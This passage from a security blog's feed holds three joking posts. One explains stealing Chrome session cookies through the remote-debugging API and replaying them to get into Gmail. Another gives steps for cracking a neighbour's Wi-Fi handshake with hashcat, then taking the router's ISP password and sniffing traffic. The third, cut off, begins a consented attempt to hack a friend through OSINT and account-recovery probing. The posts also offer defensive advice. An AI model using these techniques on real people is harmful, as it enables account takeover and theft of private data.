<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>{"id": 1, "method": "Network.getAllCookies"}
[{
"domain": "mail.google.com",
"expires": -1,
"httpOnly": false,
"name": "GMAIL_AT",
"path": "/mail/u/0",
"secure": true,
"session": true,
"size": 42,
"value": <unencrypted cookie value appears here>
},
...<the rest of the cookies>
</code></pre></div></div>
<p><img src="/img/keys.jpg" alt="keys" /></p>
<p>Because we asked nicely, Chrome just <em>gives</em> us the cookies. This bypasses the whole Chrome Safe Storage password thing because Chrome itself decrypts the cookies.</p>
<p>And we did it all without needing to become the root user, or otherwise know Naruto’s password.</p>
<p>You can plug these cookies into a Chrome Extension (for example, <a href="https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg">EditThisCookie</a>), and you’ll be logged in to Naruto’s gmail if you just go to <code class="language-plaintext highlighter-rouge">mail.google.com</code> in your browser.</p>
<p>Aaaaaand that’s it. Crimes successful. Directed by Quentin Tarantino.</p>
<hr />
<p>If you want to try this at home, here’s the code to just straight up do it for you: <a href="https://github.com/defaultnamehere/cookie_crimes">https://github.com/defaultnamehere/cookie_crimes</a>. If you want to try using it on someone else, <a href="https://www.nsa.gov/careers/">maybe this is the website for you</a>.</p>
<h3 id="prevention">Prevention</h3>
<p>If you would not like this attack being used against you, I can wholeheartedly recommend not letting someone else execute code on your computer.</p>
<p>The industry-standard best practice is to rapidly acquire blessed amulets, mysterious crystals of unknown but surely spicy origin, and/or pay-as-you-go racketeering schemes to prevent the aforementioned execution of code.</p>
<p>Failing that, I guess there’s also:</p>
<h4 id="channel-binding-cookies">Channel-binding cookies</h4>
<p>The good folks online have come up with a way to make stealing cookies harder. It’s called <a href="http://www.browserauth.net/channel-bound-cookies">Channel-Bound Cookies</a>. This lets websites ask you to prove that you have a special Token Binding Key before you can use cookies on that website.
This means that if you want to use cookies you stole from someone’s machine, you also have to steal their Token Binding Key, and use it to impersonate their browser.</p>
<p>This feature is <a href="https://www.chromestatus.com/feature/5097603234529280">in Google Chrome</a>, but <a href="https://groups.google.com/a/chromium.org/forum/#!topic/blink-dev/OkdLUyYmY1E">disabled by default</a>, and being removed if I have understood <a href="https://groups.google.com/a/chromium.org/forum/?utm_medium=email&utm_source=footer#!msg/net-dev/AjFQjBmaEQE/_3DM1hwGCQAJ">the heated discussion in this thread</a>. The feature is also in Edge (which is what Internet Explorer is called now, post Identity Crisis).</p>
<p>Even if Chrome used it, most websites don’t use Channel-binding. This is because, well, it’s not much harm to the website if Naruto’s cookies get used by someone else. That’s more Naruto’s problem, in their eyes.</p>
<h3 id="detection">Detection</h3>
<p>In theory, people can detect the theft of cookies. Google, for instance, knows that they gave the Gmail cookie above to Naruto. They can also know, that you, with a different browser, OS, and IP address, might not be Naruto. They can also detect your channel-binding errors. But hey, I haven’t seen this technique fail because of this so far.</p>
<h1 id="faq">FAQ</h1>
<h3 id="wait-so-you-have-to-already-be-running-code-on-someones-computer-for-this-to-work-thats-not-a-big-deal-at-all">Wait so you have to already be running code on someone’s computer for this to work? That’s not a big deal at all!</h3>
<p>I mean yeah pretty much you’re right. It’s not that big a deal. Nobody panic. Everybody stay cool. The kinds of people who are stealing people’s browser cookies are just gonna have an easier time since there’s no more decrypting.</p>
<h3 id="why-is-this-even-good-then">Why is this even good then?</h3>
<ul>
<li>You don’t need to know someone’s password to do it (unlike other methods)</li>
<li>It’s simple (<a href="https://github.com/defaultnamehere/cookie_crimes">one command</a> to run)</li>
</ul>
<p>I’m pretty sure this is the best way of getting Chrome cookies once you’re in someone’s computer. I sure wouldn’t bother with any other method.</p>
<h3 id="are-you-going-to-tell-google-about-this-critical-security-flaw">Are you going to tell Google about this critical security flaw?</h3>
<p>Nah, they know about it. It’s a feature of Chrome, after all. I even saw them <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=668932">deciding to add it</a>.</p>
<p>UPDATE: I told ‘em about it juuuuuust in case.</p>
<blockquote>
<p>I have to say this is working as intended. The remote debugging protocol is meant to provide full access, including cookies, and running Chrome with a flag makes it work.</p>
</blockquote>
<blockquote>
<p>I am surprised cookies can be read from a headful Chrome profile by the headless Chrome. We have plans to make profiles inter-operable, but that didn’t happen yet. Maybe cookies are supported though, I didn’t look too close.</p>
</blockquote>
<p>Thanks Google!</p>
<h3 id="isnt-it-kinda-irresponsible-to-publish-this-outta-nowhere">Isn’t it kinda irresponsible to publish this outta nowhere?</h3>
<p>see you in hell i guess</p>
<h3 id="my-head-hurts-a-little-and-i-feel-tired">My head hurts a little and I feel tired.</h3>
<p>Maybe you’re dehydrated. Try drinking some crisp cool water.</p>
<h3 id="does-this-work-on-firefox-or-shifty-eyes-internet-exploreredge">Does this work on Firefox or *shifty eyes* Internet Explorer/Edge?</h3>
<p>Dunno, I haven’t tried it and I have no idea how these browsers work. <em>You</em> could try finding out.</p>
<p>UPDATE: Ya boi wunderwuzzi23 did this for <a href="https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/">Firefox</a> and <a href="https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/">Microsoft Edge</a>.</p>
<h3 id="hey-so-how-did-you-end-up-finding-this-like-why-did-you-need-to-get-someones-chrome-cookies-in-the-first-place">Hey so how did you end up finding this? Like why did you need to get someone’s Chrome cookies in the first place?</h3>
<p>Thanks for taking the time to read this blog post.</p>
<hr />
<p>I wrote this because they were out of pearls at the bubble tea place. You can talk to me about it on Twitter if you want: <a href="https://twitter.com/mangopdf">@mangopdf</a></p>
<hr />
<p>Thanks to <a href="https://twitter.com/hackgnar">@hackgnar</a>, who wondered aloud “there must be <em>some</em> way to get the cookies without root, since the user can get their own cookies”.</p>
<p>Thanks also to <a href="https://twitter.com/noncetonic">@noncetonic</a> and wardolphin, for their guidance in pointing out that headless Chrome and remote debugging is a scary combination.</p>mangopdfI found a new way to trick Google Chrome into giving up its secrets.Hacking your neighbour’s Wi-Fi2018-01-01T05:20:38+00:002018-01-01T05:20:38+00:00/hacking-your-neighbours-wifi<p>Hey kid, wanna hack some Wi-Fi?</p>
<p>This article is your 100% lactose-free guide to hacking home Wi-Fi. By the end it’s okay to feel afraid, insecure, or even the urge to bulk-purchase home networking equipment. It’s okay. We’ve all been there.</p>
<hr />
<p>Isn’t is strange how when you move into a place and get an internet connection, you typically get given a home router as part of the package? Isn’t it strange how this router is held together using nothing but matchsticks, broken promises, and man’s hubris?</p>
<p><img src="/img/routerinterface.png" alt="routerinterface" /></p>
<p>Did you know that <a href="https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack">anyone nearby can kick you off a Wi-Fi network?</a></p>
<p>Did you know your phone <a href="https://www.crc.id.au/tracking-people-via-wifi-even-when-not-connected/">constantly broadcasts the names and locations (by proxy) of every Wi-Fi network you’ve ever connected to?</a></p>
<p>Yeah it’s all pretty broken hey?</p>
<p>Below are the steps for breaking it more.</p>
<h3 id="step-0-dont-actually-do-this">Step 0: Don’t actually do this</h3>
<p>I’m using “your neighbour” as an easy-to-remember example here.</p>
<p>You might be having what seems like a genius idea, and that’s “wowee I should hack my neighbour’s wifi because uhhhhhh”. This idea is a bad one, in the same way that trying to break into your neighbour’s house is a bad idea.</p>
<p>If you want to actually hack some Wi-Fi, try disconnecting and doing this to your own Wi-Fi.</p>
<h3 id="step-1-find-the-right-wi-fi">Step 1: Find the right Wi-Fi</h3>
<p>So in our 99.99999% theoretical scenario, you and your laptop are within range of your neighbour’s Wi-Fi router. You don’t know the password, but you want to connect. Time to do some crimes.</p>
<p>The first thing you’d do is take out your laptop and run <a href="https://google.com/?q=aircrack-ng">airodump-ng</a>, a tool for precisely the job of hacking Wi-Fi.</p>
<p>Here’s what it looks like.
<img src="/img/airodump_censored.png" alt="bssids" /></p>
<p>You see the names of nearby Wi-Fi networks and also their “BSSID”, which is a bit like an ID for Wi-Fi networks. It’s actually <em>exactly</em> like that.</p>
<h3 id="step-2-get-the-password-hash">Step 2: Get the password hash</h3>
<p>Once you know the BSSID of your neighbour’s Wi-Fi, the goal is to get the Wi-Fi password. The router won’t tell you the Wi-Fi password, but it will give up the <em>password hash<sup id="fnref:corrections" role="doc-noteref"><a href="#fn:corrections" class="footnote" rel="footnote">1</a></sup></em>.</p>
<p>A password hash is like a scrambled version of the password. You can’t unscramble it. Kinda like how you can’t unscramble scrambled eggs back into the white and the yolk.</p>
<p>We’re going to find the hash by watching……the secret handshake.</p>
<h4 id="the-secret-handshake">The secret handshake</h4>
<p>You heard me.</p>
<h5 id="is-that-real">“is that real”</h5>
<p>You might be wondering why there’s a secret handshake happening every time you connect to Wi-Fi, and that’s fair enough, I’m glad you asked.</p>
<p>Let’s say you’re a legitimate businessperson just connecting to your home Wi-Fi. No funny business. You know the password. But you need to prove to the Wi-Fi that you know the password. And the Wi-Fi needs to prove to you that <em>it</em> knows the password. The trouble is, everyone else can hear you.</p>
<p>Wi-Fi is broadcast as radio waves out of your device and router all the time. Anyone within range can hear what you’re saying.</p>
<p>It’s kinda like if you came up to me at a party and you said “I know your Facebook password”. It gets real tense. I nervously glance up at you and say “Really?”. I want to know if you really do know my Facebook password, but I also don’t want you to just say “Your Facebook password is cooldude69” because everyone else at the party is listening.</p>
<hr />
<p>So, the secret handshake lets you and the Wi-Fi router both prove you know the password without saying it.</p>
<h5 id="eavesdropping">Eavesdropping</h5>
<p>The trick is that by spying on the handshake, an eavesdropper (that’s us) could see:</p>
<ul>
<li>A randomly chosen bit of text (e.g. <code class="language-plaintext highlighter-rouge">3b5ef</code>)</li>
<li>The same text, encrypted with the Wi-Fi password as the key (<code class="language-plaintext highlighter-rouge">b8%&G</code>)</li>
</ul>
<p>You know the text, you know what it encrypts to, and you know how to do the encryption. The only thing you don’t know is what the key is. This means that you can guess something as the key, and <em>check</em> if your guess was right.</p>
<hr />
<p><em>We see “3b53f” encrypts to “b8%&G”</em></p>
<p><em>Try encrypting “3b53f” with key “password1” -> “AAERJ” // Wrong!</em></p>
<p><em>Try encrypting “3b53f” with key “cooldad1964” -> “b8%&G” // Found it!</em></p>
<hr />
<p>What if you just encrypt the text <code class="language-plaintext highlighter-rouge">3b5ef</code> with <code class="language-plaintext highlighter-rouge">cooldad1964</code> as the key, and it happens to encrypt to <code class="language-plaintext highlighter-rouge">b8%&G</code>?</p>
<p>Then you know that the password was <code class="language-plaintext highlighter-rouge">cooldad1964</code>. And if <code class="language-plaintext highlighter-rouge">3b5ef</code> encrypts to something else, then you know your guess was wrong.</p>
<h2 id="step-3-crack-the-password">Step 3: Crack the password</h2>
<p>So using the trick above, we’re going to just <em>guess</em> the password. The trick is that we’re going to be able to guess passwords way faster than if we were just typing them into the “Enter the password for this Wi-Fi network” box.</p>
<p>So, get out your pen and paper and blow the dust off that compass and straightedge because it’s time to do some encryption.</p>
<p>Just kidding, we’re not going to use pen and paper you big bozo. We’re going to use a graphics card.</p>
<p>Graphics cards are the part inside a computer that lets the computer be able to play 3D games such as PLAYERUNKNOWN’S ALLCAPS Murder Paradise and Viva Piñata: Party Animals. They also happen to be really fast at encrypting stuff.</p>
<p>So we’re going to get a big list of millions of passwords, and try them all to try and guess the Wi-Fi password.</p>
<h3 id="artisanal_passwordstxt">artisanal_passwords.txt</h3>
<p>Alright so you know how websites get hacked?</p>
<p>Sometimes, the hackers release the passwords of everyone on the website at the time it got hacked. You may have heard of these as “data breaches”.
Sites that got hacked recently and had passwords publicly exposed include LinkedIn, Adobe, and Myspace.</p>
<p>You, a person with an internet connection, can find these lists via Google. No dark web, no getting behind 7 proxies and insisting that your parents only call you by your “code name”, no nothing.</p>
<p><strong>There are two kinds of home Wi-Fi networks</strong>: The kind that are called <code class="language-plaintext highlighter-rouge">NETGEAR-7BDFC</code>, which probably have randomly generated passwords, and the kind that are called <code class="language-plaintext highlighter-rouge">Chris & Liz 2013</code>, with passwords that are in these password lists.</p>
<p>I’m going to guess that your neighbour’s password is probably in one of the heaps big lists of passwords. But to find out which one it is, we’re going to have to encrypt <code class="language-plaintext highlighter-rouge">3b5ef</code> (in this example) with every single password in the list as the encryption key<sup id="fnref:wrongagain" role="doc-noteref"><a href="#fn:wrongagain" class="footnote" rel="footnote">2</a></sup>, and see if any of them match what we saw the Wi-Fi password encrypt to (<code class="language-plaintext highlighter-rouge">b8%&G</code>).</p>
<p>(If your neighbour has one of those randomly generated passwords, then you’re out of luck. JUST kidding <a href="https://www.darknet.org.uk/2010/09/wifite-mass-wifi-wepwpa-key-cracking-tool/">click here for a fun time</a>.)</p>
<p>Now that you’ve “acquired” these password lists, you gotta figure out which password is the Wi-Fi password.</p>
<h3 id="rapid-fire-password-guessing">Rapid-fire password guessing</h3>
<p>Hashcat is software that can take a password list and a hash<sup id="fnref:hashing" role="doc-noteref"><a href="#fn:hashing" class="footnote" rel="footnote">3</a></sup> (“b8%&G”) and try to “unhash” it by comparing it to all the passwords in the list. To give you an estimate of how long this takes, my computer can check 10 million passwords in about 10 minutes. Specialised computers overflowing with graphics cards can do this in seconds.</p>
<p>You just plug the file containing the handshake that you got in Step 2 into hashcat, as well as your password lists.</p>
<p><img src="/img/hashcat.png" alt="hashcat" /></p>
<p><strong>And that’s it</strong>. Hashcat will likely just spit out the password, and you can just type it in the Wi-Fi “Enter the password” box. The main part is furiously guessing millions of passwords until we find the right one.</p>
<h3 id="why-does-this-work">Why does this work?</h3>
<p>Because people pick easy-to-guess passwords. English word with the first letter maybe capitalised then one or two numbers? That pattern covers a <em>lot</em> of people’s passwords and a computer can just quickly check all of them.</p>
<p>If you’re an average internet user, your password for everything is the same, and it’s your pet’s name followed by your house number. Even worse, it’s probably a password hackers already have in their password lists. What I’m saying is that on average, most Wi-Fi passwords people choose don’t stand a chance against these password lists.</p>
<p>You can check whether your password has been stolen by hackers (and published) by browsing to <a href="https://haveibeenpwned.com">https://haveibeenpwned.com</a></p>
<hr />
<h1 id="so-what">So what?</h1>
<p>So you can probably hack home Wi-Fi. What’s the point of doing it?</p>
<h2 id="finding-your-neighbours-isp-password">Finding your neighbour’s ISP password</h2>
<p>Routers often store the password used to connect to the ISP in their admin pages.</p>
<p>This password would let you prove that you are your neighbour when talking to their ISP. You can cancel their internet all together. You can see their billing information. You are them.</p>
<p>Let me walk you through the complex process of hacking a home router.</p>
<p>First you open up the popular hacking software, Google Chrome, and go to 192.168.0.1, which is usually the IP address of the router.</p>
<p>When you get there, you’ll see something like this.</p>
<p><img src="https://i.imgur.com/gXaUvVv.png" alt="adminadmin" /></p>
<p>Easiest <code class="language-plaintext highlighter-rouge">admin/admin</code> of your LIFE right there.</p>
<p>Once you’re in the router, the password is in the config page.</p>
<p><img src="/img/routerpassword.png" alt="router1" />
Oh no! The password is just dots! Your hacking career is over before it started!</p>
<p>Fear not, young keyboard warlock, for there is a deus ex machina that saves you in this cutscene.</p>
<p>You can <code class="language-plaintext highlighter-rouge">Right Click > Inspect Element</code> (hacker voice: i’m in) on the password field, and you’ll see this:</p>
<p><img src="/img/routerpasswordhtml.png" alt="router2" />
Edit that HTML to remove the <code class="language-plaintext highlighter-rouge">type="password"</code> aaaaaaand
<img src="/img/routerpasswordrevealed.png" alt="router3" /></p>
<p>That’s right, the dots were only put there by <em>your</em> browser. The password was under them all along. You were trapped in a prison of your own mind.</p>
<h2 id="steal-your-neighbours-data">Steal your neighbour’s data</h2>
<p>So this one isn’t as cool as it used to be, but using ancient forbidden techniques like <a href="https://en.wikipedia.org/wiki/ARP_spoofing">ARP poisoning</a> (not nearly as cool as it sounds), you can spy on what your neighbour is sending to the internet.</p>
<p>This won’t work for websites with that lovingly hand-forged green HTTPS lock, since your neighbour’s data will be encrypted.
But, there are still plenty of sites that will ask for your password or credit card information over plain ol’ HTTP.</p>
<p>Even for some HTTPS sites (which do not use Certificate Pinning or HSTS or other Dark Rituals), you can force your victim to use plain unencrypted HTTP with <a href="https://avicoder.me/2016/02/22/SSLstrip-for-newbies/">SSLStrip</a>.</p>
<hr />
<h1 id="oh-no">oh no</h1>
<p>It’s possible that reading the words on this hypertext page has made you question the bulletproof security of your own home network situation.</p>
<p>Here are some things you can do to stop worrying about your home Wi-Fi security.</p>
<h2 id="1-absolutely-nothing">1. Absolutely nothing</h2>
<p>Don’t even worry about it. The pool of people who can attack your home Wi-Fi is limited to the people in <strong>physical range</strong> of it.</p>
<p>A website like PayPal is attackable by:</p>
<ul>
<li>anyone with a computer</li>
</ul>
<p>Your home Wi-Fi is attackable by:</p>
<ul>
<li>anyone nearby your house</li>
</ul>
<p>What I’m saying here is that <strong>the chance of someone with skills and motivation to hack your Wi-Fi <em>actually doing it</em> is….really small</strong>. Probably your neighbours are just that nice family and that one guy who always leaves his beer bottles in your recycling bin.</p>
<p>Anyway that guy’s not gonna hack your Wi-Fi. This is why it’s not a <em>total</em> catastrophe that most people’s Wi-Fi security isn’t very good.</p>
<p>You might leave a spare key under the mat, or not bother to lock your windows <em>even though</em> someone could easily climb through them, because you’re not worried about someone physically breaking in. In the same way, your house probably doesn’t need extra-strong Wi-Fi security.</p>
<p>So don’t worry about it! Go to the beach! Work all day to make a rich dude slightly richer! He might thank you, but probably not! Eat a cupcake! Your Wi-Fi security probably isn’t worth worrying about.</p>
<h2 id="2-enable-paranoia-mode">2. Enable Paranoia Mode</h2>
<p>“Wait what if there IS someone trying to hack my home Wi-Fi, like my local government or perhaps a particularly intelligent bird?”</p>
<p>I mean the government has far easier ways to spy on you, but if you <em>really</em> want to tighten up your Wi-Fi security, you can:</p>
<ul>
<li>
<p>Use WPA2-PSK, and change the Wi-Fi password to something unguessable but easy to share (for your guests, of course).
Good examples include <code class="language-plaintext highlighter-rouge">fresh*life*fresh*mangoes</code> and <code class="language-plaintext highlighter-rouge">gday$one$internet$please</code>. Or randomly generate one like <code class="language-plaintext highlighter-rouge">gV@3AdSKouI&*3Wj</code> if you hate your guests and love typing.</p>
</li>
<li>
<p>Install custom router firmware like <a href="https://www.dd-wrt.com/site/index">DD-WRT</a>.
This has far fewer security holes than whatever 1997 PHP spaghetti your router came with.</p>
</li>
</ul>
<hr />
<h1 id="wait-so-have-you-ever-actually-used-this">“Wait so have you ever actually used this?”</h1>
<p>Thanks for taking the time to read this blog post.</p>
<hr />
<p><em>Big ol’ thanks to these <a href="https://rissole.github.io/alexandhorachio/game/">heroes</a> for their large brains which showed me how to do words more good.</em></p>
<p><em>If you want to talk to me about this, <a href="https://twitter.com/mangopdf">@ me on Twitter</a> I guess.</em></p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:corrections" role="doc-endnote">
<p>WARNING this is a simplification (read: wrong), there’s actually a chain of keys computed from the actual Wi-Fi password. It boils down to the above idea, tho, sorry for tricking you I’m just protecting you from the harsh truth, son. If you want the real deal and aren’t afraid of death by acronyms check out <a href="https://security.stackexchange.com/questions/66008/how-exactly-does-4-way-handshake-cracking-work">this stackoverflow answer.</a> <a href="#fnref:corrections" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:wrongagain" role="doc-endnote">
<p>Again, this is a simplification for readability. <a href="#fnref:wrongagain" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:hashing" role="doc-endnote">
<p>Okay look this isn’t really a hash and “hashed” and “encrypted” are used pretty much interchangably in this article which I <em>know</em> is wrong and really upsets a lot of pedantic people on Twitter but boy does it make this post easier to understand for people who are still learning anyway thanks for reading and as always do not @ me <a href="#fnref:hashing" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>mangopdfHacking Wi-Fi, cracking passwords, and spying on mysterious handshakes is an easy game for babies.Operation Luigi: How I hacked my friend without her noticing2017-08-04T05:02:38+00:002017-08-04T05:02:38+00:00/operation-luigi-how-i-hacked-my-friend-without-her-noticing<p><img src="https://i.imgur.com/xgqR3Ss.png" alt="intro" /></p>
<p>Hello and welcome to a blog post. I am writing it and you are reading it. It’s amazing what we can do with computers these days.</p>
<h1 id="several-months-ago">Several months ago</h1>
<p>I’m at a ramen place with my friend Diana. Diana isn’t her real name, but we’re going to pretend it is because that’s what all the cool journalists do and I wanna fit in too so don’t ruin this for me okay.</p>
<p>I ask her if it would be okay for me to try and hack all her stuff. She’s instantly visibly excited. I explain how this could result in me seeing everything she’s ever put on a computer ever. She tells me she thinks this is going to be “so good”. We lay down some rules:</p>
<ul>
<li>I’ll start some time in the next 12 months</li>
<li>No deleting anything she has</li>
<li>No disrupting her daily life</li>
<li>Stop asking if she’s sure it’s okay</li>
</ul>
<p><em>Bonus rule from me: Do this entire thing in stealth mode. Don’t ever let Diana know that I’ve started until it’s too late.</em></p>
<p>I mean, <em>obviously</em> it worked since you and I are having this nice little textual discourse right now. Take my hand metaphorically, and I’ll guide you through what I tried, my many flubs<sup id="fnref:flubs" role="doc-noteref"><a href="#fn:flubs" class="footnote" rel="footnote">1</a></sup>, and how to protect yourself from what I did<sup id="fnref:fate" role="doc-noteref"><a href="#fn:fate" class="footnote" rel="footnote">2</a></sup>.</p>
<p>And uh also at the end Mario’s green friend is there.</p>
<h1 id="part-1-research">Part 1: Research</h1>
<h2 id="open-source-intelligence-gathering-aka-googling-furiously-and-pretending-you-went-to-uni-for-this">”"”Open Source Intelligence Gathering””””” AKA googling furiously and pretending you went to uni for this</h2>
<p>Alright uh I’m pretty sure the first thing you do when you’re hacking someone is find all their personal information. I’m talking about her email, phone number, address, star sign, whether she uses Android or Windows Phone, her birthday, and so on.</p>
<h2 id="jeez-were-gonna-need-to-know-her-email-address-arent-we">Jeez we’re gonna need to know her email address aren’t we?</h2>
<p>People put lots of their information on LinkedIn (an <em>information landscape</em> that connects your inbox to people you met once in a bar and will forever file under “misc”) because it tells them to.</p>
<p>The first thing I see on Diana’s LinkedIn<sup id="fnref:findinglinkedin" role="doc-noteref"><a href="#fn:findinglinkedin" class="footnote" rel="footnote">3</a></sup> is her email address. I hastily put on my black hoodie and get my arms a bit stuck in the sleeves. Hacker voice I’m <em>in</em><sup id="fnref:hackervoice" role="doc-noteref"><a href="#fn:hackervoice" class="footnote" rel="footnote">4</a></sup>. Immediately I sigh and put my hands on my temples like a stressed-out banker. It’s a @hotmail.com address, which surprises me since, well, who’s using Hotmail in the year of our lord 2017? I mean geez if you used hotmail you’d miss out on gmail’s excellent security features heyoooo</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [x] email address
[ ] the respect of my peers
</code></pre></div></div>
<h3 id="does-she-use-this-email-for-twitter">Does she use this email for Twitter?</h3>
<p><img src="https://i.imgur.com/mQs1pgB.png" alt="twitterpw" /></p>
<p>Yep.</p>
<h3 id="how-about-her-phone-number">How about her phone number?</h3>
<p>I type a bunch of extremely clumsy things into Google. I’m talkin’ “dianalastname@hotmail.com phone”. A matrix of what looks like zeroes and ones but is actually Google search results flies down my screen at about the speed a normal person would scroll at.</p>
<p>There’s a sign-up page for a club she started at her university. The page says “Contact Diana Lastname at dianalastname@hotmail.com or [her phone number]”. pew pew got ‘em.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[x] email
[x] phone number
[ ] the respect of my peers
</code></pre></div></div>
<h3 id="storing-the-goods">Storing the goods</h3>
<p>I paste all these things into a Google Doc - an advanced NSA hacking tool leaked in the recent Shadow Brokers incident.</p>
<p>While googling securely, I find an old blog of hers from 2009. It has a search box. I immediately slam “pet”, “cat” and, “dog” in that search box like it’s 2009. The name of someone’s pet is often somehow involved in their security, either as their password or as a “Security””” question or something. I find the name of her dog from 2009 and vigorously paste it into my Google Doc.</p>
<h2 id="lets-try-getting-into-her-icloud-account">Let’s try getting into her iCloud account</h2>
<p>Armed with my weapons-grade Google Doc, I’m ready to have a go at trying to get into something of Diana’s<sup id="fnref:haventrealised" role="doc-noteref"><a href="#fn:haventrealised" class="footnote" rel="footnote">5</a></sup>.</p>
<p>I don’t really have a good reason for going after iCloud, so if you could just give me a break for <em>one second</em></p>
<p>If I click “Forgot Apple ID?” on iCloud, by entering Diana’s full name and email address, Apple tells me her Apple ID, and my screen permanently changes to green-on-black text to suit my new lifestyle.</p>
<p>I’m clicking around and there’s a section called “account recovery”. Sure, I’ll have a go.</p>
<p>I can recover the account by clicking “I’ve uh lost my phone and forgot my password AND locked out of my email”. Apple says “okay you colossal bozo, fine, but give us a phone number you CAN access, and we’ll SMS you instructions to get back into your account”. If I was in a movie doing <em>~crimes~</em> then I’d use a burner phone number. But since this is just my friend, I use my real phone number. I get an SMS from Apple being like “We received your request and will get back to you within 4 to 6 <em>business millennia</em>. Our <em>Neo-Future Customer Service Representatives</em> will contact your <em>next-of-kin</em> by whatever means of communication is prevalent at the time.”</p>
<p>There’s another “account recovery” option that says “use a device you already have”. I click this, hoping to get a list of Diana’s Apple devices. Instead it gives me this:</p>
<p><img src="https://i.imgur.com/dQmdZUM.png" alt="flubs" /></p>
<p>Daaaaaaaaaaaaaaaammmmit.</p>
<p>I have taken the wrong path in this text adventure game.</p>
<p>I’ve just notified Diana that someone’s trying to reset her account.</p>
<p>For me that would set off all kinds of alarm bells and I’d start furiously investigating what’s going on with all my accounts because I’m very cool and collected. But I’m just going to hope that Diana is a normal human being who is <em>not</em> obsessively paranoid like me and just ignores all of those pesky automated emails from Apple and Microsoft being like “blah blah account blah” or “blah blah new sign in blah” because I mean who <em>really</em> has time for those we’ve all got places to go and phones to scroll I mean <em>reallY</em> who’s gonna pay attention to <em>one liTtlE email</em> when there’s a whole OCEAN of low quality memes to scroll past on Facebook? I mean <em>wouldn’t you rather</em> see some nice political memes? Newsfeed alert: Some guy from high school has just been tagged in- <em>oh wow lOok</em> this one’s about your local government, <em>wowee</em> they’ve even managed to use the meme font while standing their ground and writing all the text as though it’s a trying-to-sound-formal letter from your school principal who is still desperately trying to combat cyberbullying using nothing but stern words and beginning every sentence with “In regards to….”</p>
<p>There’s no way for me to know if she saw the notification, so I stop rolling around on the floor whispering about low quality memes and get back to work.</p>
<h2 id="several-days-later">Several days later</h2>
<p>My phone rings. I can feel the vibration in my pocket and I’m like “is someone <em>calling</em> me here in the year of our lord 2017 I can’t believe this”. I don’t recognise the number.</p>
<p>“Hello?”</p>
<p>“Hi, who am I talking to?”</p>
<p>“It’s uh Alex.”</p>
<p>“Alex?”</p>
<p>“Yeah.”</p>
<p>“Alex <code class="language-plaintext highlighter-rouge"><my last name></code>?”</p>
<p>“Uh, noooo it’s-“</p>
<p>“Ohhhhhhhhhhhhh.”</p>
<p>“Wait so who am <em>I</em> talking to?”</p>
<p>It’s Diana.</p>
<p>“What’s up?”, I ask.</p>
<p>She explains to me how she got an email from Apple about her account and there was a phone number in it. I tug my collar several meters into the next room, knocking over several carefully-potted indoor plants.</p>
<p>I hit pause on this whole thing, immediately own up, and say “yep, that was me, no need to worry, and I didn’t get anywhere, your iCloud account is safe and s- WAIT a minute are you telling me you got an email from Apple saying someone tried to reset your account, realised it wasn’t you, saw the phone number, and then CALLED it? What was your plan if some hacker answered??”</p>
<p>She didn’t have a plan. She just called it as soon as she saw it, the <em>absolutely</em> off-the-rails lunatic.</p>
<p>We have a nice chat and agree to hang out later. She asks me if I’ve “hacked her already”, and I say “no comment” to preserve my so-far flawless operational security.</p>
<p>Before I hang up, I wanna show off my work so far.</p>
<p>“Hey Diana, one more thing”</p>
<p>“Yeah?”</p>
<p>“Check it out. Did you ever play a game called…….. Fashion Fantasy Beach?”<sup id="fnref:fantasybeach" role="doc-noteref"><a href="#fn:fantasybeach" class="footnote" rel="footnote">6</a></sup>, I say, coolly and relatably.</p>
<p>Diana freaks out and starts laughing. She’s forgotten about this game and me reminding her of her account brings back good memories.</p>
<p>“Can you like, find all the accounts I had on all those game websites?”</p>
<p>Sweet young Diana. If only it worked that way. Hacking can only be used for stealing government secrets and ransoming bitcoins. It’s just not that simple.</p>
<p>“By the way, just checking, it’s still okay for me to try and hack all your stuff right?”
“SO okay”</p>
<h1 id="part-2-hackinggggg">Part 2: Hackinggggg</h1>
<p>At this point I could reset Diana’s password for some services by answering her “Security””” Questions with all the information I’ve gathered.</p>
<p>But, I realise, far too late and to the live studio audience’s disappointment, that would violate the “don’t interfere with her daily life” part of our deal. If I reset her password, this will lock her out of whatever account I reset. So, I have to get access stealthily.
This will uh heavily involve <em>knowing</em> her password rather than resetting it.</p>
<p>For a long time I consider doing the renaissance-era “send ‘em a word doc with a macro in it to get control of their computer then submit to defcon” but I worry that sweet young millennials like Diana don’t even use Word because they do everything on their phone or Google Docs while simultaneously consuming 17.28 avocados per second <em>look it up</em>.<sup id="fnref:googledocs" role="doc-noteref"><a href="#fn:googledocs" class="footnote" rel="footnote">7</a></sup></p>
<p>I guess that makes the most valuable thing in her life her email. If you remember earlier, I cunningly divined her email address in Part 1, so I’m basically halfway there.
If I get her email, I can just reset her password for Facebook, Twitter, Fashion Fantasy Beach, etc.
My cyber attack vector cyber entry point exploit would then be <em>typing the password into the Hotmail login screen using the Google Chrome Web Browsing Software</em>.</p>
<h2 id="the-shady-password-market">The shady password market</h2>
<p>Alright listen we’re about to go into password paradise so buckle whatever it is you normally buckle.
Hackers right, they hack websites. Hoo boy they just love to pop those hypertext pages. Like Dropbox, MySpace, LinkedIn, Adobe, Tumblr, and many, many more. They try to steal everyone’s username and password from these sites by making a copy of the database and taking it. Sometimes, the database of usernames and passwords they steal gets released on the ~<em>dark web</em>~, for free or for money.
Conveniently, there’s a website (https://haveibeenpwned.com) which lets you type in your email address (<em>not</em> your password you big bozo) and find out whether any of your passwords have appeared in these leaked stolen databases.</p>
<p>But…. nowhere does it say you have to type in <em>your</em> email address. Cunningly, I type dianalastname@hotmail.com, executing hacking.</p>
<p><img src="https://i.imgur.com/Uh13Flz.png" alt="hibp" />
<img src="https://i.imgur.com/TuR0lfl.png" alt="hibp2" /></p>
